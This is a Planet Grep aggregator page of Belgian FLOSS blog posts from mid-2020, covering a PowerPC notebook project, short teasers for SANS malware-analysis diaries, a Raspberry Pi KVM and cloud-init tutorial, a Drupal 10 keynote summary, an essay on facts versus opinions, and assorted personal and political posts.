Planet Grep

Planet'ing Belgian FLOSS people

Planet Grep is maintained by Wouter Verhelst. All times are in UTC.

August 09, 2020

PowerPC Notebook

powerpc notebook

I prefer RISC as a CPU architecture over CISC. RISC is a simpler design that should deliver more CPU performance with fewer transistors and is more power-efficient. We have to recognize that Intel and AMD have made great progress in increasing the performance and efficiency of the x86 CISC architecture.

But the x86 architecture comes with a freedom cost: Intel has the Intel Management Engine, and closed proprietary software is required to initialize the components. The same can be said about AMD: AMD has the AMD Platform Security Processor, and binary blobs are required.

Power is currently the most powerful alternative that doesn’t require binary blobs. This is great not only for free/open-source activists: truly open-source firmware that can be reviewed and audited is also nice for security reasons.

For these reasons, I support the PowerPC notebook initiative. This project tries to design an open-hardware PowerPC notebook; the schematics are already completed and available at GitLab:

The project is running a donation campaign to complete the PCB design at:

If this project interests you, you might consider donating to it.

Have fun!

August 06, 2020

I published the following diary on “A Fork of the FTCode Powershell Ransomware“:

Yesterday, I found a new malicious Powershell script that deserved to be analyzed due to the way it was dropped on the victim’s computer. As usual, the malware was delivered through a malicious Word document with a VBA macro. A first observation reveals that it’s a fileless macro. The malicious Base64 code is stored in multiple environment variables that are concatenated and then executed through an IEX command… [Read more]

The post [SANS ISC] A Fork of the FTCode Powershell Ransomware appeared first on /dev/random.

August 03, 2020

I got a Raspberry PI 4 to play with and installed Manjaro GNU/Linux on it.

I use OpenZFS on my Pi. The latest kernel update broke ZFS on my Pi due to a license conflict; the solution is to disable PREEMPT in the kernel config. This bug was already resolved in OpenZFS with the mainline Linux kernel tree, at least on x86_64/amd64; I'm not sure why the kernel on the Raspberry Pi is still affected.

I was looking for an excuse to build a custom kernel for my Pi anyway :-). I cloned the default Manjaro RPI4 kernel package and disabled PREEMPT in the kernel config.
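The config change itself is a one-line edit. A minimal sketch, using a toy .config and the mainline config symbol names (verify them against your own tree; in a kernel checkout, `scripts/config --disable PREEMPT` does the same thing):

```shell
# Toy .config for illustration; in a real tree you would edit the
# generated .config after `make menuconfig` or use scripts/config.
printf 'CONFIG_PREEMPT=y\n# CONFIG_PREEMPT_NONE is not set\n' > .config

# Disable PREEMPT and select the no-preemption model instead.
sed -i \
  -e 's/^CONFIG_PREEMPT=y/# CONFIG_PREEMPT is not set/' \
  -e 's/^# CONFIG_PREEMPT_NONE is not set/CONFIG_PREEMPT_NONE=y/' \
  .config

cat .config
```

After this, rebuild the kernel package as usual; the resulting kernel no longer exports the preempt-related GPL-only symbols that conflict with the ZFS module.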

The package is available at: This package also doesn’t update /boot/config.txt and /boot/cmdline.txt, so it won’t overwrite custom settings.

Have fun!

I published the following diary on “Powershell Bot with Multiple C2 Protocols“:

I spotted another interesting Powershell script. It’s a bot and is delivered through a VBA macro that spawns an instance of msbuild.exe. This Windows tool is often used to compile/execute malicious code on the fly (I already wrote a diary about this technique). I don’t have the original document but, based on a technique used in the macro, it is part of a Word document. It calls Document_ContentControlOnEnter… [Read more]

The post [SANS ISC] Powershell Bot with Multiple C2 Protocols appeared first on /dev/random.

August 01, 2020

An old man (a railway official) looks back and methodically describes his perfectly ordinary life (which was not always so ordinary).

When, midway through his autobiography, he is recovering from a mild stroke (or heart attack?), he comes into conflict with himself and questions his own life and motives, reaching the philosophical-psychological conclusion that he carried several persons within him who, from different motives, did good and less good things, with sometimes one and sometimes another taking the lead, and that his life could therefore just as well have turned out very differently.

On Goodreads I could not bring myself to give it more than 3/5 stars.

July 31, 2020

The disturbing thing is that it is no longer disturbing when the President of the United States says he would not help Germany if Russia were to attack. Fortunately, the Cold War with Russia turning hot is further away than just about any of the possible alternatives, regardless of what certain propaganda machines try to make us believe.

Meanwhile, we are still not working on a European army of our own. Just in case it is ever needed.

It is, however, Germany's own decision to buy gas from Russia and transport it via Nord Stream 2. And so it is not up to the United States to interfere with that, certainly not by applying pressure through the abuse of NATO agreements.

It is now really time to send NATO into retirement. This cannot go on. Twitter or not. Clown or not. The words of a President have consequences.

That way we might be in time to protect that gas pipeline against American aggression? Because it looks like we will get American bombs on that project if we do not swallow their idiotic, unsolicited and unwanted LNG.

July 30, 2020

July 27, 2020

The other day, we went to a designer's fashion shop whose owner was rather adamant that he was never ever going to wear a face mask, and that he didn't believe the COVID-19 thing was real. When I argued for the opposing position, he pretty much dismissed what I said out of hand, claiming that "the hospitals are empty dude" and "it's all a lie". When I told him that this really isn't true, he went like "well, that's just your opinion". Well, no -- certain things are facts, not opinions. Even if you don't believe that this disease kills people, the idea that this is a matter of opinion is missing the ball by so much that I was pretty much stunned by the level of ignorance.

His whole demeanor pissed me off rather quickly. While I disagree with the position that it should be your decision whether or not to wear a mask, it's certainly possible to have that opinion. However, whether or not people need to go to hospitals is not an opinion -- it's something else entirely.

After calming down, the encounter got me thinking, and made me focus on something I'd been thinking about before but hadn't fully formulated: the fact that some people in this world seem to misunderstand the nature of what it is to do science, and end up, under the claim of being "sceptical", with various nonsense things -- see scientology, flat earth societies, conspiracy theories, and whathaveyou.

So, here's something that might (but probably won't) help some people figuring out stuff. Even if it doesn't, it's been bothering me and I want to write it down so it won't bother me again. If you know all this stuff, it might be boring and you might want to skip this post. Otherwise, take a deep breath and read on...

Statements are things people say. They can be true or false; "the sun is blue" is an example of a statement that is trivially false. "The sun produces light" is another one that is trivially true. "The sun produces light through a process that includes hydrogen fusion" is another statement, one that is a bit more difficult to prove true or false. Another example is "Wouter Verhelst does not have a favourite color". That happens to be a true statement, but it's fairly difficult for anyone that isn't me (or any one of the other Wouters Verhelst out there) to validate as true.

While statements can be true or false, combining statements without more context is not always possible. As an example, the statement "Wouter Verhelst is a Debian Developer" is a true statement, as is the statement "Wouter Verhelst is a professional Volleybal player"; but the statement "Wouter Verhelst is a professional Volleybal player and a Debian Developer" is not, because while I am a Debian Developer, I am not a professional Volleybal player -- I just happen to share a name with someone who is.

A statement is never a fact, but it can describe a fact. When a statement is a true statement, either because we trivially know what it states to be true or because we have performed an experiment that proved beyond any possible doubt that the statement is true, then what the statement describes is a fact. For example, "Red is a color" is a statement that describes a fact (because, yes, red is definitely a color, that is a fact). Such statements are called statements of fact. There are other possible statements. "Grass is purple" is a statement, but it is not a statement of fact; because as everyone knows, grass is (usually) green.

A statement can also describe an opinion. "The Porsche 911 is a nice car" is a statement of opinion. It is one I happen to agree with, but it is certainly valid for someone else to make a statement that conflicts with this position, and there is nothing wrong with that. As the saying goes, "opinions are like assholes: everyone has one". Statements describing opinions are known as statements of opinion.

The differentiating factor between facts and opinions is that facts are universally true, whereas opinions only hold for the people who state the opinion and anyone who agrees with them. Sometimes it's difficult or even impossible to determine whether a statement is true or not. The statement "The numbers that win the South African Powerball lottery on the 31st of July 2020 are 2, 3, 5, 19, 35, and powerball 14" is not a statement of fact, because at the time of writing, the 31st of July 2020 is in the future (which at this point gives it a 1 in 24,435,180 chance of being true). However, that does not make it a statement of opinion; it is not my opinion that the above numbers will win the South African powerball; instead, it is my guess that those numbers will be correct. Another word for "guess" is hypothesis: a hypothesis is a statement that may be universally true or universally false, but for which the truth -- or its lack thereof -- cannot currently be proven beyond doubt. On Saturday, August 1st, 2020 the above statement about the South African Powerball may become a statement of fact; most likely, however, it will instead become a false statement.
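Assuming the South African Powerball draws five main numbers from a pool of 45 plus one powerball from a pool of 20 (my assumption, but it matches the quoted figure), the odds work out as:

```latex
\binom{45}{5} \times 20 = 1\,221\,759 \times 20 = 24\,435\,180
```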

An unproven hypothesis may be expressed as a matter of belief. The statement "There is a God who rules the heavens and the Earth" cannot currently (or ever) be proven beyond doubt to be either true or false, which by definition makes it a hypothesis; however, for matters of religion this is entirely unimportant, as for believers the belief that the statement is correct is all that matters, whereas for nonbelievers the truth of that statement is not at all relevant. A belief is not an opinion; an opinion is not a belief.

Scientists do not deal with unproven hypotheses, except insofar as they attempt to prove, through direct observation of nature (either out in the field or in a controlled laboratory setting), that the hypothesis is, in fact, a statement of fact. This makes unprovable hypotheses unscientific -- but that does not mean that they are false, or even that they are uninteresting statements. Unscientific statements are merely statements that science can neither prove nor disprove, and that therefore lie outside of the realm of what science deals with.

Given that background, I have always found the so-called "conflict" between science and religion to be a non-sequitur. Religion deals in one type of statements; science deals in another. They do not overlap, since a statement can either be proven or it cannot, and religious statements by their very nature focus on unprovable belief rather than universal truth. Sure, the range of things that science has figured out the facts about has grown over time, which implies that religious statements have sometimes been proven false; but is it heresy to say that "animals exist that can run 120 kph" if that is the truth, even if such animals don't exist in, say, Rome?

Something very similar can be said about conspiracy theories. Yes, it is possible to hypothesize that NASA did not send men to the moon, and that all the proof contrary to that statement was somehow fabricated. However, by its very nature such a hypothesis cannot be proven or disproven (because the statement states that all proof was fabricated), which therefore implies that it is an unscientific statement.

It is good to be sceptical about what is being said to you. People can have various ideas about how the world works, but only one of those ideas -- one of the possible hypotheses -- can be true. As long as a hypothesis remains unproven, scientists love to be sceptical themselves. In fact, if you can somehow prove beyond doubt that a scientific hypothesis is false, scientists will love you -- it means they now know something more about the world and that they'll have to come up with something else, which is a lot of fun.

When a scientific experiment or observation proves that a certain hypothesis is true, then this probably turns the hypothesis into a statement of fact. That is, it is of course possible that there's a flaw in the proof, or that the experiment failed (but that the failure was somehow missed), or that a particular event was not observed when a scientist tried to observe it, but only because the scientist missed it. If you can show that any of those possibilities hold for a scientific proof, then you'll have turned a statement of fact back into a hypothesis, or even (depending on the exact nature of the flaw) into a false statement.

There's more. It's human nature to want to be rich and famous, sometimes no matter what the cost. As such, there have been scientists who have falsified experimental results, or who have claimed to have observed something when this was not the case. For that reason, a scientific paper that gets written after an experiment turned a hypothesis into fact describes not only the results of the experiment and the observed behavior, but also the methodology: the way in which the experiment was run, with enough details so that anyone can retry the experiment.

Sometimes that may mean spending a large amount of money just to be able to run the experiment (most people don't have an LHC in their backyard, say), and in some cases some of the required materials won't be available (the latter is especially true for, e.g., certain chemical experiments that involve highly explosive things); but the information is always there, and if you spend enough time and money reading through the available papers, you will be able to independently prove the hypothesis yourself. Scientists tend to do just that; when the results of a new experiment are published, they will try to rerun the experiment, partially because they want to see things with their own eyes; but partially also because if they can find fault in the experiment or the observed behavior, they'll have reason to write a paper of their own, which will make them a bit more rich and famous.

I guess you could say that there are three types of people who deal with statements: scientists, who deal with provable hypotheses and statements of fact (but who have no use for unprovable hypotheses and statements of opinion); religious people and conspiracy theorists, who deal with unprovable hypotheses (where the religious people deal with these to serve a larger cause, while conspiracy theorists only care about the unprovable hypotheses); and politicians, who should care about proven statements of fact and produce statements of opinion, but who usually attempt the reverse of those two these days :-/


mic drop

Our life is now nothing but waiting. Waiting for the next message, the next notification, the next piece of news, the next task.

By becoming hyperproductive, we have reduced the time devoted to practice. We concentrate with formidable efficiency to meet a deadline. Before waiting again.

We call it rest, catching up on the news, distraction. In reality it is waiting, an in-between.

We hoped our connected devices would fill our idle moments, would make us productive when we were forced to wait. In reality, we now wait to connect. Our phone no longer keeps us busy in the queue. It is the waiter who interrupts our connection to bring us our coffee.

Email and chat have made our interactions permanent. If at first these tools let us wait for our next meeting, today a meeting is a wait before plunging back into our tools.

The dream of a connected humanity is on the verge of coming true. But this incredible shared space has turned out to be a gigantic waiting room. Together we wait, some for love, some for recognition, some for fame, some for a political renewal.

We do not realize that those who find what they seek, or who stop waiting, slip away discreetly. We wait. We devote more energy to promoting our achievements than to accomplishing them. We read at full speed to win reading challenges; we want to make our children laugh so we can share the photo. Our life is a wait to reconnect to the waiting room, the one where we devour and share advice on living a better life.

And when we believe we are breaking the vicious circle, when we think we are reconnecting with ourselves rather than with the rest of the world, we impatiently await the moment when we can finally share it, make it exist through the virtual gaze of the others who are waiting.

Photo by Anthony Tran on Unsplash

I am @ploum, an electronic writer. If you enjoyed this text, feel free to support me on Paypal or in millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Your regular support, even symbolic, is a real motivation and recognition. Thank you!

This text is published under the CC-By BE license.

This past weekend Vanessa and I went camping in Phippsburg, Maine just three hours north from where we live. During this pandemic I have missed travel and adventure. It was really nice to swap out the espresso machine for the percolator and to spend time in nature.

Coffee and eggs for breakfast
A coffee percolator.
View from inside our tent: our legs are shown in the foreground and the ocean in the background.
Waking up overlooking the ocean.
Dries reading by the fire
Reading The Ride of a Lifetime by the campfire.

July 25, 2020

I published the following diary on “Compromized Desktop Applications by Web Technologies”:

For a long time now, it has been said that “the new operating system is the browser”. Today we do everything in our browsers: we connect to the office, we process emails and documents, we chat, we perform our system maintenance, … But many popular web applications also provide a desktop client: Twitter, Facebook, and Slack are good examples. Such applications just replace the classic browser and use APIs to interact with the official website. Most applications are developed in a compiled language and are deployed as regular executable files. Others rely on web technologies or have a modular architecture that helps to add features via a system of plugins or modules… [Read more]

The post [SANS ISC] Compromized Desktop Applications by Web Technologies appeared first on /dev/random.

July 24, 2020

Update June 28th: 2.7.6 was released, all is (or should be) fine … :-)

There are currently two known issues in Autoptimize 2.7.5 that will be fixed in the next release:

  1. when “inline & defer CSS” and “also aggregate inline CSS” are active, the top “admin bar” might become invisible for logged-in users. Unticking “also aggregate inline CSS” is a confirmed workaround.
  2. when “inline & defer CSS” is active, CSS-files that are not aggregated (excluded or 3rd party) and that do not have a media-attribute will not be deferred.

If you want you can download the beta of what will become 2.7.6 here and install that instead of 2.7.5 to get rid of these known issues.

July 23, 2020

I published the following diary on “Simple Blacklisting with MISP & pfSense“:

Here is an example of a simple but effective blacklist system that I’m using on my pfSense firewalls. pfSense is a very modular firewall that can be expanded with many packages. About blacklists, there is a well-known package called pfBlocklist. Personally, I prefer to avoid installing extra packages on my firewalls because it increases the risk of facing problems while upgrading (pfSense recommends disabling them before any upgrade). Some packages might also be developed by third parties with a light security mindset that, therefore, introduce bugs in a core element of the infrastructure… [Read more]

The post [SANS ISC] Simple Blacklisting with MISP & pfSense appeared first on /dev/random.

I got a Raspberry PI 4 to play with and installed Manjaro GNU/Linux on it.

I wanted to verify how usable the latest PI is for desktop and home server usage.

  • For desktop usage, it is “usable”.

    For video playback in the browser, I recommend disabling 60fps and keeping video playback at 720p. Please note that if you want to use it for Netflix, you will need Widevine for the DRM content. As far as I know, there isn’t an ARM64 version available. An ARM32 version exists, but I haven’t tried it (yet).

  • For (home) server usage ARM64 or AArch64 is getting more usable.

    Cloud providers are also offering ARM64-based systems. A container-based workload - like Docker, LXC, FreeBSD jails, etc. - is probably better suited to a small device like the Raspberry Pi. Virtual machines are still important for server usage, so let’s see how the Pi 4 can handle them.

Most GNU/Linux distributions (Red Hat, CentOS, Ubuntu, Debian) offer cloud images for ARM64. To configure these images you’ll need cloud-init.

I already wrote a blog post on how to use cloud-init with KVM/libvirt on GNU/Linux: Howto use centos cloud images with cloud-init on KVM/libvirtd. Let’s see if we can get it working on ARM64.

If you want to use a USB storage device (even with an SSD), I recommend using a Y-powered USB cable or a powered storage enclosure.


I always use OpenZFS for my important data. On Arch Linux, ZFS is available in the AUR. The more-or-less default ZFS AUR packages - zfs-dkms and zfs-utils - have a dependency on the x86_64 architecture. Luckily, somebody already created packages that work fine on any platform: zfs-dkms-any and zfs-utils-any.

Install yay

Yay is a nice tool to install AUR packages automatically. Let’s make our life easier and install it.

Install the base development packages.

[staf@minerva ~]$ sudo pacman -Sy base-devel

Install yay.

Create a git directory.

[staf@minerva ~]$ mkdir github
[staf@minerva ~]$ cd github/
[staf@minerva github]$ 

Clone the git repo.

[staf@minerva github]$ git clone

Build and install the package.

[staf@minerva github]$ cd yay
[staf@minerva yay]$ makepkg -si

Install OpenZFS

Install the zfs-dkms-any zfs-utils-any packages.

[staf@minerva ~]$ yay -S zfs-dkms-any zfs-utils-any

Install libvirt/QEMU

On an x86_64 system we’d start by verifying that the CPU has virtualization enabled, by checking /proc/cpuinfo or lscpu. I don’t know if an ARM64 CPU has a flag for it; lscpu doesn’t report virtualization support on the Raspberry Pi.
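As a rough sketch of such a check (the messages are my own wording, not the output of any standard tool): on x86_64 the CPU flags are authoritative, while on ARM64 a practical substitute is checking whether the kernel exposes /dev/kvm.

```shell
# Report whether hardware virtualization looks usable. x86_64 CPUs expose
# vmx (Intel) or svm (AMD) flags; on ARM64 we fall back to checking for
# the /dev/kvm device node provided by the kernel.
check_virt() {
    if grep -qE 'vmx|svm' /proc/cpuinfo 2>/dev/null; then
        echo "x86 hardware virtualization flags found"
    elif [ -c /dev/kvm ]; then
        echo "/dev/kvm present, KVM should work"
    else
        echo "no KVM support detected"
    fi
}

check_virt
```

On the Raspberry Pi, the presence of /dev/kvm is the signal that matters; virt-host-validate (run below) performs a more thorough version of the same checks.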

Install the required packages.

[root@minerva ~]# pacman -S libvirt qemu lxc ebtables dnsmasq bridge-utils openbsd-netcat dmidecode virt-manager

Start and enable the libvirtd systemd service.

[root@minerva ~]# systemctl start libvirtd
[root@minerva ~]# systemctl enable libvirtd

Execute virt-host-validate to verify that virtualization works correctly.

[staf@minerva ~]$ virt-host-validate
  QEMU: Checking if device /dev/kvm exists                                   : PASS
  QEMU: Checking if device /dev/kvm is accessible                            : PASS
  QEMU: Checking if device /dev/vhost-net exists                             : PASS
  QEMU: Checking if device /dev/net/tun exists                               : PASS
  QEMU: Checking for cgroup 'cpu' controller support                         : PASS
  QEMU: Checking for cgroup 'cpuacct' controller support                     : PASS
  QEMU: Checking for cgroup 'cpuset' controller support                      : PASS
  QEMU: Checking for cgroup 'memory' controller support                      : PASS
  QEMU: Checking for cgroup 'devices' controller support                     : PASS
  QEMU: Checking for cgroup 'blkio' controller support                       : PASS
  QEMU: Checking for device assignment IOMMU support                         : WARN (Unknown if this platform has IOMMU support)
   LXC: Checking for Linux >= 2.6.26                                         : PASS
   LXC: Checking for namespace ipc                                           : PASS
   LXC: Checking for namespace mnt                                           : PASS
   LXC: Checking for namespace pid                                           : PASS
   LXC: Checking for namespace uts                                           : PASS
   LXC: Checking for namespace net                                           : PASS
   LXC: Checking for namespace user                                          : PASS
   LXC: Checking for cgroup 'cpu' controller support                         : PASS
   LXC: Checking for cgroup 'cpuacct' controller support                     : PASS
   LXC: Checking for cgroup 'cpuset' controller support                      : PASS
   LXC: Checking for cgroup 'memory' controller support                      : PASS
   LXC: Checking for cgroup 'devices' controller support                     : PASS
   LXC: Checking for cgroup 'freezer' controller support                     : PASS
   LXC: Checking for cgroup 'blkio' controller support                       : PASS
   LXC: Checking if device /sys/fs/fuse/connections exists                   : PASS
[staf@minerva ~]$ 

Install UEFI aarch64

As a first test, I started virt-manager to install the Debian ARM64 installation ISO, but virt-manager reported that UEFI was missing. Tianocore is an open-source implementation of the UEFI firmware that can be used with libvirtd.

It is not available in the standard Manjaro repositories, but an AUR package is available.

[staf@minerva ~]$ yay -Ss tianocore 
aur/edk2-avmf 20200201-1 (+2 0.42) (Installed)
    QEMU ARM/AARCH64 Virtual Machine Firmware (Tianocore UEFI firmware).
aur/ovmf-git 1:r25361.514c55c185-1 (+30 0.00) 
    Tianocore UEFI firmware for qemu.
aur/uefi-shell-git 26946.edk2.stable201903.1209.gf8dd7c7018-1 (+49 0.08) 
    UEFI Shell v2 - from Tianocore EDK2 - GIT Version
[staf@minerva ~]$ yay -S edk2-avmf

After the installation, a test install with the Debian ARM64 ISO image went fine, just like on an x86_64 system.

Cloud image

There are cloud images available for most popular GNU/Linux distributions for the ARM64 architecture. I’ll use Ubuntu in the example below.


Cloud-init itself isn’t available on Manjaro, but the cloud-utils package is. It isn’t required to have cloud-init on the libvirt host to install a cloud image, but it’s useful to have it to check the syntax etc. You can do this on another system or try to install it from source (see links below).

Install the cloud-utils package.

[staf@minerva ~]$ pkgfile cloud-localds
[staf@minerva ~]$ sudo pacman -S cloud-utils

Download the cloud image


Download the Ubuntu cloud image from and verify your download.


Verify the checksum file

You can verify the list of GPG keys used by Ubuntu at

[staf@minerva ubuntu]$ gpg --keyid-format long  --verify SHA256SUMS.gpg SHA256SUMS
gpg: Signature made Tue 14 Jul 2020 23:29:05 CEST
gpg:                using RSA key 1A5D6C4C7DB87C81
gpg: Can't check signature: No public key

Import the GPG public key.

[staf@minerva ubuntu]$ gpg --keyid-format long --keyserver hkp:// --recv-keys 1A5D6C4C7DB87C81
gpg: key 1A5D6C4C7DB87C81: public key "UEC Image Automatic Signing Key <>" imported
gpg: Total number processed: 1
gpg:               imported: 1
[staf@minerva ubuntu]$ 

And verify again.

[staf@minerva ubuntu]$ gpg --keyid-format long  --verify SHA256SUMS.gpg SHA256SUMS
gpg: Signature made Tue 14 Jul 2020 23:29:05 CEST
gpg:                using RSA key 1A5D6C4C7DB87C81
gpg: Good signature from "UEC Image Automatic Signing Key <>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: D2EB 4462 6FDD C30B 513D  5BB7 1A5D 6C4C 7DB8 7C81
[staf@minerva ubuntu]$ 

The “Primary key fingerprint” has to match the fingerprint on

Verify the image

[staf@minerva ubuntu]$ sha256sum -c SHA256SUMS 2>&1 | grep OK
focal-server-cloudimg-arm64.img: OK
[staf@minerva ubuntu]$ 



The image is a normal qcow2 image file.

[staf@minerva ubuntu]$ file focal-server-cloudimg-arm64.img 
focal-server-cloudimg-arm64.img: QEMU QCOW2 Image (v2), 2361393152 bytes
[staf@minerva ubuntu]$ 

Use qemu-img info to get more information about the image.

[staf@minerva ubuntu]$ qemu-img info focal-server-cloudimg-arm64.img 
image: focal-server-cloudimg-arm64.img
file format: qcow2
virtual size: 2.2 GiB (2361393152 bytes)
disk size: 493 MiB
cluster_size: 65536
Format specific information:
    compat: 0.10
    refcount bits: 16
[staf@minerva ubuntu]$ 

Copy & resize

Copy the image to the final location.

[root@minerva ubuntu]# cp -v focal-server-cloudimg-arm64.img  /var/lib/libvirt/images/ubuntu/tst.qcow2
'focal-server-cloudimg-arm64.img' -> '/var/lib/libvirt/images/ubuntu/tst.qcow2'
[root@minerva ubuntu]# 

and resize the image.

[root@minerva ubuntu]# cd /var/lib/libvirt/images/ubuntu/
[root@minerva ubuntu]# qemu-img resize tst.qcow2 20G


Upgrade and default user

A complete overview of cloud-init configuration directives is available at

We’ll create a cloud-init configuration file to update all the packages - which is always a good idea - and add a default user to the system.

A cloud-init configuration file has to start with #cloud-config. Remember, this is YAML, so only use spaces…

We’ll create a password hash that we’ll put into our cloud-init configuration. It’s also possible to use a plain-text password in the configuration with chpasswd, or to set the password for the default user, but it’s better to use a hash so nobody can see the password. Keep in mind that it is still possible to brute-force the password hash.

Some (Debian-based) GNU/Linux distributions have the mkpasswd utility; it is not available on Manjaro. The mkpasswd utility that is part of the expect package is something else…

I used a python one-liner to generate the SHA512 password hash.

python -c 'import crypt,getpass; print(crypt.crypt(getpass.getpass(), crypt.mksalt(crypt.METHOD_SHA512)))'

Execute the one-liner and type in your password.

Create config.yaml - replace <your_user>, <your_hash>, <your_ssh_pub_key> - with your data:

#cloud-config
package_upgrade: true
users:
  - name: <your_user>
    groups: wheel
    lock_passwd: false
    passwd: <your_hash>
    shell: /bin/bash
    sudo: ['ALL=(ALL) NOPASSWD:ALL']
    ssh_authorized_keys:
      - ssh-rsa <your_ssh_pub_key>

You can validate the cloud-init file with cloud-init devel schema. Manjaro doesn’t have the cloud-init package; you can compile it from source or verify the file on a system that has cloud-init installed.

[root@minerva ubuntu]# cloud-init devel schema --config-file config.yaml
Valid cloud-config file config.yaml
[root@minerva ubuntu]# 


Create a network config file.

version: 2
ethernets:
  <interface_name>:
    addresses: [ ]
    nameservers:
      addresses: [ ]

Create the config.iso.

[root@minerva ubuntu]# cloud-localds config.iso config.yaml --network-config net_config.yaml 
[root@minerva ubuntu]# 

Create the virtual system

Libvirt has predefined definitions for operating systems. You can query the predefined operating systems with the osinfo-query os command.

We use Ubuntu 20.04; use osinfo-query os to find the correct definition.

[root@minerva ubuntu]# osinfo-query os | grep -i ubuntu | grep 20
 ubuntu20.04          | Ubuntu 20.04                                       | 20.04    |          
[root@minerva ubuntu]# 

Create the virtual machine.

virt-install \
  --memory 2048 \
  --vcpus 1 \
  --name tst \
  --disk /var/lib/libvirt/images/ubuntu/tst.qcow2,device=disk \
  --disk /var/lib/libvirt/images/ubuntu/config.iso,device=cdrom \
  --os-type linux \
  --os-variant ubuntu20.04 \
  --virt-type kvm \
  --graphics none \
  --network network:default
[root@minerva ubuntu]# 

The default escape key - to get out of the console - is ^] ( Ctrl + ] )

Have fun!


July 20, 2020

Last week, Drupalists from around the world gathered for DrupalCon Global. This DrupalCon was the first ever virtual event of this scale for the Drupal community.

As a matter of tradition, I delivered the opening keynote. You can watch a video recording of my keynote, download a copy of my slides (212 MB), or read the brief summary below.

The online conference web application showing my slides, my webcam, and real-time chat.
A screenshot of the first ever virtual DriesNote. The virtual conference tool showed my slides, my webcam, and real-time chat.

I announced that we are targeting the release of Drupal 10 around June 2022.

Next, I spent the majority of my presentation proposing five strategic initiatives for Drupal 10. While it seems early to speak about Drupal 10, we need to start working on these strategic goals now to have them ready by the time Drupal 10 is released.

A slide from the DriesNote showing that the goal of the presentation is to propose five well-balanced initiatives for Drupal 10.
The goal of my presentation was to propose five well-balanced initiatives for Drupal 10.

We decided to go with just five initiatives so we're more focused and because the Drupal 10 release cycle will be shorter than Drupal 9's. Selecting only five initiatives was hard. I spent 35 minutes walking the audience through the selection process. The five proposed initiatives:

  1. Drupal 10 readiness
  2. An easier out-of-the-box experience
  3. A new front-end theme (Olivero)
  4. Automated updates for security releases
  5. An official JS menu component for React and Vue

1. Drupal 10 readiness

Drupal depends on third-party software components, many of which will go end-of-life (EOL) in the next few years. When a component goes EOL, it will no longer receive security support.

The "Drupal 10 Readiness" initiative will focus on upgrading these third-party components. Not only does this keep Drupal secure, it also allows us to take advantage of any new capabilities that come with these updated components.

A slide from the DriesNote with a table that lists jQuery 3, CKEditor 4, jQuery UI, PHPUnit 8, Symfony 4, PHP 7, Composer 1, etc
Some of the third-party components that need to be updated in preparation for Drupal 10.

2. Easy out-of-the-box

Improving Drupal's ease-of-use remains the number one most impactful item for the community to work on.

Drupal 9 dramatically improved Drupal's ease-of-use. Several of our most promising improvements made it very far, but still need some finishing touches. Specifically, our new Media Library, Layout Builder and Administration Theme (Claro) are not yet enabled by default.

I proposed the "Easy out-of-the-box" initiative to work towards enabling these features by default. I believe this initiative will be very impactful in terms of attracting new users to Drupal.

A slide from the DriesNote visualizing the 'Easy out of the box' as the sum of Media, Layout Builder and Claro.
The 'Easy out of the box' initiative consists of finishing Media, Layout Builder and Claro.

3. Front end theme

One of the most important features to complete is our modern front end theme, Olivero. While there has been a lot of progress in this area, Olivero does not ship with Drupal yet. We want to make sure this beautiful front end theme is available by default.

A screenshot of the upcoming front-end theme called Olivero. It looks clean, modern and light.
A screenshot of the upcoming front-end theme called Olivero.

4. Automatic updates

As shown by the Drupal 2020 Product Survey, by far the most requested feature is automated updates.

Fortunately, it's something we have been working on for some time. Our first milestone will be to automate security updates so all site owners can sleep well at night, no matter when security releases are taking place.

Beyond security, automated updates help us work towards our long-term vision of building a composable — or Assembled Web — architecture for Drupal.

The Automated Updates initiative requires integrity checks for Drupal core, Composer 2, package signing and a custom bootloader.
The four major architectural building blocks of the Automated Updates initiative.

5. JavaScript menu component

As I have been saying for years now, many websites are evolving into personalized, omnichannel digital experiences. It's a multi-decade trend, and one of the most powerful ones in our industry.

Drupal needs to keep evolving with this trend in mind. On the back end, we need to continue to make Drupal the best structured data engine and web service platform. On the front end, JavaScript continues to grow fast. While Drupal is recognized as a capable headless or decoupled CMS, there is still more we can do.

Furthermore, the second most requested feature in the Drupal 2020 Product Survey was a more modern administration UI. These kinds of UIs are typically built using JavaScript and web service APIs. When done well, a JavaScript UI can offer major usability improvements.

Clearly, there is more than one reason to invest in web service APIs and to embrace more JavaScript in Drupal:

  1. Many of Drupal's end users are focused on building decoupled front ends and omnichannel digital experiences.
  2. Drupal could improve its own administration UI with more WYSIWYG, drag-and-drop, and other ease-of-use features.

To make a start toward improving Drupal's headless capabilities and administration UI, I proposed we start to add official Drupal JavaScript components to Drupal Core.

As a first step, I recommended implementing a JavaScript menu component in Vue and React. This would mark the first official JavaScript component in Drupal.

A slide from the DriesNote that shows a flag with the text 'Decoupled menu components' waving on the top of a mountain.
'Planting the flag' for providing official JavaScript menu components for Drupal.

Developing a JavaScript menu component solves a very real problem that many front end developers face. This menu component would render a menu and could be placed in a front end JavaScript application. The content of the menu comes from Drupal. This would allow content authors and non-developers to make simple menu changes without the need for custom code.

Releasing a first official JavaScript component will require us to set up the tools and processes to manage and release JavaScript components. This will establish a pattern or recipe for more components. Once we build one component, it will be easier to add many more in parallel.

A slide from the DriesNote that shows the long path to the flag at the top of the mountain.
The path to having a first official JavaScript component is longer than it may appear.

Let's do this!

A slide from the DriesNote that shows a fictitious Drupal 10 press release dated June 2022.
A fictitious or forward-looking press release for Drupal 10 in June 2022.

With the release of Drupal 10 targeted for June 2022, our community has a big opportunity to make the beginner and non-developer experiences much simpler, while still keeping Drupal's power as strong as ever for experts. I believe the proposed strategic initiatives will help achieve that.

For more details, I recommend you watch the recording of my presentation.

Whether you're just getting started with Drupal or have been here for years, we want you to contribute to Drupal 10! The best way to get involved in any of these initiatives is to join their discussion channels on Drupal Slack:

  • Drupal 10 readiness: #d10readiness
  • Claro: #admin-ui
  • Olivero: #d9-theme
  • Automated updates: #autoupdates
  • JS Menu Component: #js-menu-component

Thank you to everyone who attended the very first Drupalcon Global and contributed to the event's success. Even though we were unable to meet in person, I was blown away by the energy of everyone involved, and grateful for the time to connect with old and new friends.

July 18, 2020

Read and approved: “Reis bij Maanlicht” (Journey by Moonlight) by Antal Szerb, written in 1937 but not dated at all.

Topics: a honeymoon, a psychosis, eros and thanatos, friendships past, and whether or not to conform. And about Venice, Florence, Spello, Rome, …

July 17, 2020

This obviously comes from some forum or other. But I wanted to immortalize it in one of my famously, tremendously important blog posts, so that the whole world can look it up for good.

